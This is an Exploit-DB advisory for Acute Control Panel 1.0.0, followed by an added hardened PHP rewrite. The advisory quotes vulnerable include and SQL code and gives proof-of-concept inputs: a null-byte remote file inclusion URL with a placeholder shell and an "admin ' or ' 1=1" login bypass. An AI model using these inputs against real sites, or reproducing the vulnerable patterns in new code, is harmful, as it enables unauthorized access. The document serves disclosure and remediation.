- 18 Dec 2022
- EDB-ID
- 8291
- EDB verification
- Passed
- Author
- SIRGOD
- Vulnerability type
- WEBAPPS
- Platform
- PHP
- CVE
- CVE-2009-1248 CVE-2009-1247
- Publication date
- 2009-03-26
Code:
###############################################################
[+] Acute Control Panel 1.0.0 RFI/SQL Injection (Auth Bypass)
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
###############################################################
[+] Remote File Inclusion
Vulnerable code in container.php
-----------------------------------------------------------
<?php include_once($theme_directory."/sidebar.php"); ?>
-----------------------------------------------------------
PoC :
http://127.0.0.1/themes/container.php?theme_directory=[Shell]%00
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Vulnerable code in header.php
--------------------------------------------------------------
<?php include_once($theme_directory."/navigation.php"); ?>
--------------------------------------------------------------
PoC :
http://127.0.0.1/themes/header.php?theme_directory=[Shell]%00
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] SQL Injection (Auth Bypass)
Vulnerable code in login.php
--------------------------------------------
$query = mysql_query("SELECT
id,username,password,email,fullname,permissions FROM `users` WHERE
username='$username' AND password='$password'", $conn) or
die(mysql_error());
--------------------------------------------
PoC :
Username : admin ' or ' 1=1
Password : anything or nothing
################################################################
# milw0rm.com [2009-03-26]
- Source
- www.exploit-db.com
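
A hardened counterpart to the two patterns quoted in the advisory, added here as an example and not taken from the advisory or from Acute Control Panel: the include path is chosen from an allow-list instead of a request-controlled `$theme_directory`, and the login lookup binds the username as a parameter. The theme names, the PDO connection, the in-memory SQLite demo table and the `password_hash()` storage format are assumptions.

```php
<?php
declare(strict_types=1);

// Assumption: themes live in fixed subdirectories under this base path.
const THEME_BASE = __DIR__ . '/themes';
// Assumption: hypothetical theme names; the advisory does not list the real ones.
const ALLOWED_THEMES = ['default', 'dark'];

// Map a requested theme name to a directory on disk. Anything not on the
// allow-list (URLs, traversal sequences, null bytes) falls back to the first theme,
// so request data never reaches include_once().
function resolve_theme_directory(?string $requested): string
{
    $name = in_array($requested, ALLOWED_THEMES, true) ? $requested : ALLOWED_THEMES[0];
    return THEME_BASE . '/' . $name;
}

// Look up the user with a bound parameter, then check the password in PHP.
// The username is never concatenated into the SQL text, so quotes stay data.
function authenticate(PDO $db, string $username, string $password): ?array
{
    $stmt = $db->prepare(
        'SELECT id, username, password, email, fullname, permissions
           FROM users WHERE username = :username'
    );
    $stmt->execute([':username' => $username]);
    $user = $stmt->fetch(PDO::FETCH_ASSOC);
    // Assumption: the password column holds a password_hash() value.
    if ($user === false || !password_verify($password, $user['password'])) {
        return null; // same result for unknown user and wrong password
    }
    unset($user['password']);
    return $user;
}

// Constructed demo data: in-memory SQLite stands in for the application's database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT,
           email TEXT, fullname TEXT, permissions TEXT)');
$ins = $db->prepare('INSERT INTO users (username, password, email, fullname, permissions)
                     VALUES (?, ?, ?, ?, ?)');
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT),
               'admin@example.test', 'Admin', 'all']);

// The login input quoted in the advisory, then a legitimate login, then a non-listed theme.
var_dump(authenticate($db, "admin ' or ' 1=1", 'anything'));
var_dump(authenticate($db, 'admin', 'correct horse'));
var_dump(resolve_theme_directory('http://example.test/x'));
```

Database errors are left to exceptions here instead of being echoed to the client as `die(mysql_error())` does in the quoted `login.php`.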